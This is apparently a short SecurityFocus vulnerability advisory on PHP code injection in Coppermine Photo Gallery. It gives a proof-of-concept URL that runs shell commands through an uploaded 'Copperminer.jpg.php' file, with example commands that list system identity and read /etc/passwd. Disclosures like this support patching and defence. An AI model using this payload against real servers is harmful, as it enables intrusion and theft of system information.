Coppermine Photo Gallery PHP Code Injection Vulnerability

The following proof of concept has been provided:

http://www.example.com/albums/userpics/Copperminer.jpg.php?[command]

Where command can be something like "id;uname%20-a" or "cat%20/etc/passwd"


 

Privacy Statement
Copyright 2010, SecurityFocus